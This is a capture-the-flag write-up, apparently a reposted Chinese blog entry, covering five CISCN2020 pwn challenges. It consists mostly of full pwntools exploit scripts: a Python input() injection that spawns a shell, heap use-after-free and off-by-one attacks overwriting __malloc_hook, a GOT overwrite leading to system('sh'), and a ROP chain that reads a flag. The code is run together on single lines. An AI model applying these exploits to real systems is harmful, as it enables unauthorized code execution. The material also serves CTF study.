首页 > 编程入门 文章详情

CISCN2020 PWNwp

编程入门 行业动态 更新时间:2024-10-28 10:27:30

CISCN2020 PWNwp

CISCN2020 PWNwp

国赛嘛,不想说啥

这里写目录

      • babyjsc
      • maj
      • easyboxs
      • nofree
      • wow
      • 总结

babyjsc

非预期,python的input命令执行漏洞

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'p = 0
def pwn(ip,port,debug):p = remote(ip,port)payload='''__import__('os').system('sh')'''p.sendline(payload)p.interactive()
if __name__ == '__main__':pwn('101.200.53.148',13465,0)

maj

UAF,没有打印函数,更改IO_stdout来泄露libc地址,然后改malloc_hook为shell
脚本1/16的成功率。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('pwn')
p = 0
def pwn(ip,port,debug):global pif(debug == 1):p = process('./pwn')else:p = remote(ip,port)def add(size,content):p.sendlineafter(">> ","1")p.sendlineafter("please answer the question\n\n","80")p.sendlineafter("______?\n",str(size))p.sendlineafter("start_the_game,yes_or_no?\n",content)def add2(size,content):p.sendlineafter(">> ","1")p.sendlineafter("please answer the question\n","80")p.sendlineafter("______?",str(size))p.sendlineafter("start_the_game,yes_or_no?",content)def free2(index):p.sendlineafter(">> ","2")p.sendlineafter("index ?",str(index))def free(index):p.sendlineafter(">> ","2")p.sendlineafter("index ?\n",str(index))def edit(index,content):p.sendlineafter(">> ","4")p.sendlineafter("index ?\n",str(index))p.sendafter("__new_content ?\n",content)def edit2(index,content):p.sendlineafter(">> ","4")p.sendlineafter("index ?",str(index))p.sendafter("__new_content ?",content)add(0x60,p64(0) + p64(0x71))add(0x60,p64(0) + p64(0x51))add(0x60,p64(0)*3 + p64(0x51))edit(0,p64(0) + p64(0x71))edit(1,p64(0) + p64(0x51))edit(2,p64(0)*3 + p64(0x51))free(0)free(1)edit(1,'\x10')add(0x60,'a')# delete(1)add(0x60,p64(0)*0xb + p64(0x71))edit(4,p64(0)*0xb + p64(0x71))free(1)edit(4,p64(0)*0xb + p64(0x91))free(1)edit(4,p64(0)*0xb + p64(0x71))#0x25ddedit(1,'\xdd\x25')add(0x60,'a')#5add(0x60,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')#6edit(6,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')one = [0x45226,0x4527a,0xf0364,0xf1207]p.recv(0x40)libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600print "baseaddr=",hex(libcbase_addr)pause()one_gagedt=libcbase_addr+one[3]libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]fuck_chunk = malloc_hook - 0x23add2(0x60,'a')#7free2(7)edit2(7,p64(fuck_chunk))add2(0x60,'a')#8add2(0x60,'b'*0x13 + p64(one_gagedt))#9edit2(9,'b'*0x13 + p64(one_gagedt))p.sendlineafter(">> ","1")p.sendlineafter("please answer the question\n","80")p.sendlineafter("______?","60")#gdb.attach(p)p.interactive()
if __name__ == '__main__':pwn('101.200.53.148',15423,0)

easyboxs

off-by-one,同样是没有打印函数,真有意思,感觉除了洞不一样,跟maj基本没啥区别

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('pwn')
p = 0
def pwn(ip,port,debug):global pif(debug == 1):p = process('./pwn')else:p = remote(ip,port)def add(index,size,content):p.sendlineafter(">>>\n",'1')p.sendlineafter("idx:\n",str(index))p.sendlineafter("len:\n",str(size))p.sendafter("content:\n",content)def add2(index,size,content):p.sendlineafter(">>>",'1')p.sendlineafter("idx:",str(index))p.sendlineafter("len:",str(size))p.sendafter("content:",content)def free(index):p.sendlineafter(">>>\n",'2')p.sendlineafter("idx:\n",str(index))def free2(index):p.sendlineafter(">>>",'2')p.sendlineafter("idx:",str(index))add(0,0x18,"A"*0x18)add(1,0xf8,"A")add(2,0x68,"B")add(3,0x68,"C")add(4,0x18,"D")free(0)add(0,0x18,"A"*0x18+"\xe1")free(1)free(2)add(0,0xd8,"A")add(5,0x18,"A")add(0,0x28,'\xdd\x25')free(5)add(5,0x18,"A"*0x18+"\x71")add(0,0x68,'a')add(0,0x68,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')one= [0x45226,0x4527a,0xf0364,0xf1207]p.recv(0x40)libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600print "baseaddr=",hex(libcbase_addr)pause()one_gagedt=libcbase_addr+one[3]libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]fuck_chunk = malloc_hook - 0x23free2(3)add2(0,0xa1,p64(0)*7+p64(0x71)+p64(fuck_chunk))add2(0,0x68,'a')add2(0,0x68,'b'*0x13 + p64(one_gagedt))p.sendlineafter(">>>",'1')p.sendlineafter("idx:",'1')p.sendlineafter("len:",'20')#gdb.attach(p)p.interactive()
if __name__ == '__main__':pwn('101.200.53.148',34521,0)

nofree

这个是我们whali3n51师傅做的,topchunk攻击,然后更改got表制造printf漏洞

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('pwn')
p = 0
def pwn(ip,port,debug):global pif(debug == 1):p = process('./pwn')else:p = remote(ip,port)def add(idx,size,content):p.sendlineafter("choice>> ","1")p.sendlineafter("idx: ",str(idx))p.sendlineafter("size: ",str(size))	p.sendafter("content: ",content)def edit(idx,content):p.sendlineafter("choice>> ","2")p.sendlineafter("idx: ",str(idx))p.sendafter("content: ",content)for i in range(0x18):add(0,0x90,'x'*0x90)add(0,0x90,'\x00')edit(0,"x"*0x18+p64(0xe1))add(1,0x90,'x'*0x30)add(0,0x90,'x'*0x90)edit(1,"x"*0x38+p64(0x81)+p64(0x602140))add(0,0x90,'x'*0x77)add(2,0x90,'x'*0x77+'\x00'*17+p64(0x81))edit(2,"x"*0x70+p64(0x602068))edit(0,p64(0x400700))add(0,0x10,"%17$p")p.recvuntil("0x")libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")libcbase_addr=int(p.recv(12),16)-0x20840edit(2,"x"*0x70+p64(0x602068))system_addr=libcbase_addr+libc.symbols['system']print "system_addr=",hex(system_addr)edit(0,p64(system_addr))add(0,0x10,"sh")#gdb.attach(p)p.interactive()
if __name__ == '__main__':pwn('101.200.53.148',12301,0)

wow

单字节溢出,通过修改部分指针从而控制返回地址,放入ORW的ROP,读出flag

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('wow')
p = 0
def pwn(ip,port,debug):global pif(debug == 1):p = process('./wow')else:p = remote(ip,port)poprax=0x41ea0apoprsi=0x407578poprdx=0x40437fpoprdi=0x4047bapoprsp=0x405831syscall_ret=0x4dc054addr_p='@'addr_d='#'value_p='^'value_d='|'write='&'read='$'loop1='{'loop2='}'p.recvuntil("our code:\n")p.sendline(value_p+loop1+addr_p+value_p+loop2+read)p.recvuntil("running....")p.send("\xd0")p.recvuntil("code: ")stack_addr=u64(p.recv(6).ljust(8,"\x00"))print "stack_addr=",hex(stack_addr)p.sendafter("continue?\n",'y')p.sendlineafter('enter your code:\n',value_p+loop1+addr_p+value_p+loop2+read)p.recvuntil("running....")p.send("\xf8")p.sendafter("continue?\n",'y')ret_addr=stack_addr-0x598p.sendlineafter('enter your code:\n',value_p+loop1+read+addr_p+value_p+loop2+read+'c'+p64(0)+p64(poprsp)+p64(ret_addr))ROP=''ROP+=p64(poprdi)+p64(stack_addr-0x4d0)+p64(poprsi)+p64(72)+p64(poprax)+p64(2)+p64(syscall_ret)ROP+=p64(poprdi)+p64(3)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(0)+p64(syscall_ret)ROP+=p64(poprdi)+p64(1)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(1)+p64(syscall_ret)ROP+="flag\x00"pause()p.send(ROP)p.send('\xb0'*820)p.sendafter("continue?\n",'n')p.interactive()
if __name__ == '__main__':pwn('101.200.53.148',15324,0)

总结

pwn感觉有点套娃,尤其是maj与easyboxs差不多一样。个人觉得没啥新的知识点或者创意。

更多推荐

CISCN2020 PWNwp

本文发布于:2023-07-28 19:48:10,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1292027.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:PWNwp

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表